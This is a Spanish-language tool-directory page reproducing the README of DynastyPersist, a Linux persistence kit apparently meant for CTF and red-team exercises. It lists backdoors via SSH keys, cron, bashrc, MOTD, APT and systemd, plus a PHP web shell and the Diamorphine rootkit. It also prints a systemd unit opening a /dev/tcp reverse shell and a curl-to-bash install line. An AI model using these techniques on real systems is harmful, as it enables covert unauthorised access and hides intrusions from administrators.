Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
DynastyPersist — Kit de herramientas de persistencia en Linux con 11 módulos para puertas traseras de claves SSH, cronjobs, servicios systemd, rootkits LKM y escalada de privilegios LD_PRELOAD. Diseñado para competiciones CTF y operaciones de equipo rojo. | Kitploit
Herramientas/GitHubGitHub/trevohack/dynastypersist
Escalada de PrivilegiosMecanismos de PersistenciaPost-ExplotaciónCTFPruebas de PenetraciónRed Teaming
GitHubtrevohack/dynastypersist

DynastyPersist

Kit de herramientas de persistencia en Linux con 11 módulos para puertas traseras de claves SSH, cronjobs, servicios systemd, rootkits LKM y escalada de privilegios LD_PRELOAD. Diseñado para competiciones CTF y operaciones de equipo rojo.

Ver Repositorio
16221hace 11 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

DynastyPersist 1.5

DynastyPersist: Una herramienta simplificada para lograr persistencia en Linux sin esfuerzo.
Soporta KoTH, Battlegrounds y Operaciones de Pentest

GitHub License GitHub Repo stars Static Badge

Instalación • Documentación • Uso

image

Documentación

[ CARACTERÍSTICAS ]

[ Módulos ]

Generación de Claves SSH

  • Obtén acceso a un servidor usando la generación de claves ssh. Este módulo crea una clave id_rsa para cada usuario. Que puede usarse para acceso inverso. Después de ejecutar este módulo, el atacante puede conectarse al servidor mediante ssh.

  • Esto se puede hacer manualmente usando el comando ssh-keygen. Sin embargo, el módulo crea una clave privada para cada usuario en poco tiempo.

root@kitploit:~
root@kali ~ ssh -i id_rsa [email protected]
  • Número de Módulo: 1

Persistencia mediante Cronjob

  • Los cronjobs en Linux son tareas programadas que se ejecutan automáticamente a intervalos especificados.

  • Uno de los módulos más eficientes, que involucra shells inversas. Este módulo escribe directamente comandos de shell inversa en /etc/crontab. Lo que abrirá una shell en el puerto que estás escuchando.

root@kitploit:~
root@kali ~ nc -nvlp 9999
  • Número de Módulo: 2

Usuario Personalizado con Root

  • Un método simple y rápido para obtener acceso inverso. Simplemente, este módulo crea otro usuario con acceso root. Más tarde, el atacante puede iniciar sesión como ese usuario mediante ssh.
root@kitploit:~
root@kali ~ ssh [email protected]
  • Número de Módulo: 3

Persistencia RCE

  • Este módulo viene con un script php alojado en el directorio raíz web. El script se encuentra en /var/www/html/dynasty_rce/rce.php. Además, el prefijo dynasty_rce puede ocultarse si el módulo LKM se ejecuta antes.

  • Visitar victim_ip:port/dynasty_rce/rce.php te dará el poder de ejecutar comandos dentro de la shell.

  • Número de Módulo: 4

LKM Rootkit

  • Un método avanzado de persistencia, que implanta un rootkit en el kernel del servidor. El programa se centra en un rootkit LKM de código abierto llamado Diamorphine. El módulo se encuentra en /var/tmp/.memory como ubicación temporal. Este directorio se elimina después de configurar el módulo.

  • El siguiente bloque de código muestra los usos de este módulo.

root@kitploit:~
victim@ubuntu ~ kill -64 0 # Promueve a usuario root.
victim@ubuntu ~ mkdir dynasty_persist # Cualquier directorio que comience con dynasty se ocultará.
victim@ubuntu ~ kill -31 <process> # Oculta procesos
victim@ubuntu ~ lsmod | grep -i diamorphine # Se oculta a sí mismo
victim@ubuntu ~ kill -63 0 # Lo hace aparecer en la salida de lsmod
  • Número de Módulo: 5

Persistencia en Bashrc

  • Este módulo escribe comandos de shell inversa, alias y variables para acceso inverso. Se otorga una shell cuando un usuario inicia sesión en el servidor o cuando la persona usa find o cat.
root@kitploit:~
root@kali ~ nc -nvlp 9999
  • Número de Módulo: 6

Servicio systemd para Root

  • Un módulo que crea un servicio personalizado en systemd para acceso inverso.

  • Un ejemplo:

root@kitploit:~
Description=Dynasty Persist

[Service]
ExecStart=sudo bash /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/9999 0>&1'
Restart=always
RestartSec=30

[Install]
WantedBy=default.target"
  • El ejemplo anterior se creará como un servicio. Este método es eficiente y duradero.

  • Número de Módulo: 7

Configuración de Escalada de Privilegios LD_PRELOAD

  • LD_PRELOAD es una variable de entorno en Linux que permite a los usuarios precargar una biblioteca compartida antes que otras bibliotecas. La escalada de privilegios usando LD_PRELOAD implica cargar una biblioteca maliciosa para interceptar y modificar llamadas al sistema, potencialmente obteniendo privilegios elevados. El módulo coloca un backdoor en comandos como find y wget.

  • Número de Módulo: 8

Backdoor en Mensaje del Día / Header

  • El "Mensaje del Día" (MOTD) en Linux es un texto personalizable que se muestra a los usuarios al iniciar sesión, proporcionando información o actualizaciones sobre el sistema. Normalmente se almacena en el archivo /etc/motd y puede ser modificado por los administradores del sistema.

  • Este módulo escribe una shell en /etc/update-motd.d/00-header. Esto se activa típicamente cuando un usuario inicia sesión.

  • Número de Módulo: 9

Modificar un Servicio systemd Existente

  • Similar al módulo 7, este modifica un servicio existente para acceso inverso.

  • Simplemente, reescribe ExecStartPre en el servicio con un comando de shell inversa.

  • Número de Módulo: 10

Backdoor en APT

  • "APT" significa Advanced Package Tool, y se usa comúnmente en sistemas basados en Debian como Ubuntu. El archivo estará aquí: /etc/apt/apt.conf.d/42backdoor

  • Coloca un backdoor en el comando apt, cada vez que se ejecute apt abrirá una shell.

  • Número de Módulo: 11

[ MODOS ]

  • Actualmente, hay 2 modos disponibles en la última actualización (1.4).

  • Los modos son console y ctf que están diseñados para funcionar con un comportamiento específico.

  • En comparación, el modo console viene con más funciones y estabilidad que el modo ctf.

Console

  • El modo console inicia la herramienta en la configuración habitual, con todas las funciones. Estas funciones se ejecutarán localmente en el host local donde se está ejecutando el script. Diseñado para persistencia en operaciones en tiempo real.

  • El prefijo use seguido del número de módulo se usará para ejecutar cualquier módulo seleccionado. Por ejemplo, use 1

  • Además, la interfaz se actualiza; los módulos/payloads ahora son visibles cuando escribes show payloads.

  • Por último, el menú de ayuda/opciones también se modifica; ingresa show options para verlo.

CTF

  • El modo ctf es una característica adicional para iniciar sesión en un servidor comprometido a través de SSH y obtener persistencia. Este complemento ayudará mucho en KoTH o Battlegrounds. Además, ahorrará mucho tiempo dedicado a configurar la persistencia.

  • Ejecuta la mayoría de las funciones de console.

[ USO ]

  • La sintaxis para usar la herramienta se describe a continuación:
root@kitploit:~
$ ./dynasty.sh <lhost> <lport> <mode> 
$ ./dynasty.sh ctf 
$ ./dynasty.sh 10.10.14.3 9999 console 

Instalación

Mediante Git

root@kitploit:~
$ git clone https://github.com/Trevohack/DynastyPersist
$ cd DynastyPersist/src 

Mediante Curl

root@kitploit:~
$ curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

¡Gracias!

Descargar herramienta
CaracterísticasDescripción
Generación de Claves SSHGenera automáticamente claves SSH para acceso encubierto.
Persistencia mediante CronjobConfigura cronjobs para persistencia programada.
Usuario Personalizado con RootCrea un usuario personalizado con privilegios root.
Persistencia RCELogra persistencia mediante ejecución remota de código.
LKM/RootkitDemuestra persistencia mediante rootkit basado en Módulo del Kernel de Linux (LKM).
Persistencia en BashrcModifica archivos de inicialización de shell específicos del usuario para persistencia (aliases / shells inversas).
Servicio systemd para RootConfigura un servicio systemd para lograr persistencia root.
Configuración de Escalada de Privilegios LD_PRELOADConfigura LD_PRELOAD para escalada de privilegios.
Backdoor en Mensaje del Día / HeaderColoca un backdoor en la visualización del mensaje del sistema para acceso encubierto.
Modificar un Servicio systemd ExistenteManipula un servicio systemd existente para persistencia.
Backdoor en el Comando APTColoca un backdoor en el comando apt para abrir una shell.